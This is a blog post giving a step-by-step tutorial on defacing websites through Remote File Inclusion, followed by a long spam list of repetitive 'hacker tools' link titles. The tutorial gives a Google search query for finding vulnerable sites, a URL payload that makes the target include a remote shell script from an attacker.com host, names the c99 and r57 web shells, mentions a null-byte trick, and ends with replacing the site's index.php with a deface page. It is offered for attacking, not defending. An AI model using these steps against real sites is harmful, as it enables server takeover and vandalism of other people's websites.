viernes, 2 de junio de 2023

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Read more
  1. How To Install Pentest Tools In Ubuntu
  2. Hacker Tools Linux
  3. Pentest Tools List
  4. Pentest Tools Nmap
  5. Hack Tools Online
  6. Hacker Tools
  7. Game Hacking
  8. Bluetooth Hacking Tools Kali
  9. Pentest Tools Windows
  10. Pentest Tools Android
  11. Hacking Tools Mac
  12. Hacker Tools
  13. Kik Hack Tools
  14. Tools For Hacker
  15. Pentest Box Tools Download
  16. Pentest Tools List
  17. Pentest Tools For Ubuntu
  18. Hack Tools 2019
  19. Hacker Tools Free
  20. Hacker Tools For Windows
  21. Hacker Tools Software
  22. Hacker Tools Free
  23. Black Hat Hacker Tools
  24. Hacker Tools For Windows
  25. Easy Hack Tools
  26. Hack Tools Pc
  27. Pentest Tools Android
  28. Hacker Tools List
  29. Hacking Tools For Windows
  30. Pentest Tools Open Source
  31. Pentest Automation Tools
  32. Hak5 Tools
  33. Pentest Tools Online
  34. Hacking Tools For Windows
  35. Hacking App
  36. Hack Website Online Tool
  37. New Hack Tools
  38. Hacker Tools Windows
  39. Ethical Hacker Tools
  40. Pentest Tools For Windows
  41. Pentest Tools For Ubuntu
  42. Pentest Tools Kali Linux
  43. Top Pentest Tools
  44. Hacker Techniques Tools And Incident Handling
  45. Tools For Hacker
  46. Hacker Tools For Pc
  47. Pentest Tools Framework
  48. Pentest Recon Tools
  49. Hack Tools 2019
  50. Termux Hacking Tools 2019
  51. Pentest Tools Url Fuzzer
  52. Hacker Techniques Tools And Incident Handling
  53. Beginner Hacker Tools
  54. Hacker Tools For Mac
  55. Hacker Tools Free
  56. Tools For Hacker
  57. Hacker Tools 2020
  58. Hacking Tools Free Download
  59. Best Hacking Tools 2020
  60. Hacking Tools For Beginners
  61. Hack App
  62. Hacking Tools For Windows Free Download
  63. Beginner Hacker Tools
  64. Tools Used For Hacking
  65. How To Hack
  66. Pentest Recon Tools
  67. Pentest Tools Subdomain
  68. Pentest Tools Apk
  69. Pentest Tools Find Subdomains
  70. Physical Pentest Tools
  71. Black Hat Hacker Tools
  72. Hacking Tools Name
  73. Pentest Tools Android
  74. Pentest Tools Website Vulnerability
  75. Install Pentest Tools Ubuntu
  76. Kik Hack Tools
  77. Pentest Tools Open Source
  78. Hacking Tools And Software
  79. Hacking Tools Windows
  80. Pentest Tools Find Subdomains
  81. Pentest Tools For Mac
  82. Hacking Tools Windows
  83. Hacking Apps
  84. Hacker Tools Online
  85. Hack Tools For Windows
  86. Pentest Tools Kali Linux
  87. Pentest Recon Tools
  88. Hacker
  89. Pentest Tools Linux
  90. Pentest Automation Tools
  91. Hack Tools
  92. Hacker Tools For Ios
  93. Best Pentesting Tools 2018
  94. Pentest Automation Tools
  95. How To Hack
  96. Hack Tools For Windows
  97. Growth Hacker Tools
  98. How To Install Pentest Tools In Ubuntu
  99. Usb Pentest Tools
  100. Hacker Security Tools
  101. Hacking Tools Mac
  102. Hacking Tools Name
  103. Hack Tools Online
  104. Hacker Tool Kit
  105. Kik Hack Tools
  106. Hack Website Online Tool
  107. Bluetooth Hacking Tools Kali
  108. Hackers Toolbox
  109. Pentest Tools Subdomain
  110. Hack Tools
  111. Hacker Tools List
  112. Hacks And Tools
  113. Computer Hacker
  114. Hack Tools For Mac
  115. Hacker Tools Apk Download

No hay comentarios: